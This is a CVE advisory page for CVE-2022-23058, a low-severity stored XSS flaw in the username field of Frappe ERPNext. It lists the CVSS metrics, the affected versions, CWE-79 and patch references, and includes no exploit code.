CVE-2022-23058 — LOW (3.5) — White Hats Nepal

Q: How severe is CVE-2022-23058?

CVE-2022-23058 has been rated LOW with a CVSS base score of 3.5/10. Review the CVSS metrics above for detailed severity breakdown.

Q: Is there a patch for CVE-2022-23058?

Check the references section above for vendor advisories and patch information. Affected products include: Frappe Erpnext.

Vulnerability Description

ERPNext in versions v12.0.9-v13.0.3 are affected by a stored XSS vulnerability that allows low privileged users to store malicious scripts in the ‘username’ field in ‘my settings’ which can lead to full account takeover.

CVSS Score

3.5

LOW

AV:N/AC:M/Au:S/C:N/I:P/A:N

Confidentiality

NONE

Integrity

PARTIAL

Availability

NONE

Affected Products

Vendor	Product	Versions
Frappe	Erpnext	>= 12.0.9, < 13.1.0

Related Weaknesses (CWE)

CWE-79

References

https://github.com/frappe/frappe/commit/497ea861f481c6a3c52fe2aed9d0df1b6c99e9d7PatchThird Party Advisory
https://www.mend.io/vulnerability-database/CVE-2022-23058ExploitPatchThird Party Advisory
https://github.com/frappe/frappe/commit/497ea861f481c6a3c52fe2aed9d0df1b6c99e9d7PatchThird Party Advisory
https://www.mend.io/vulnerability-database/CVE-2022-23058ExploitPatchThird Party Advisory

FAQ

What is CVE-2022-23058?

CVE-2022-23058 is a vulnerability with a CVSS score of 3.5 (LOW). ERPNext in versions v12.0.9-v13.0.3 are affected by a stored XSS vulnerability that allows low privileged users to store malicious scripts in the ‘username’ field in ‘my settings’ which can lead to fu...

How severe is CVE-2022-23058?

CVE-2022-23058 has been rated LOW with a CVSS base score of 3.5/10. Review the CVSS metrics above for detailed severity breakdown.

Is there a patch for CVE-2022-23058?

Check the references section above for vendor advisories and patch information. Affected products include: Frappe Erpnext.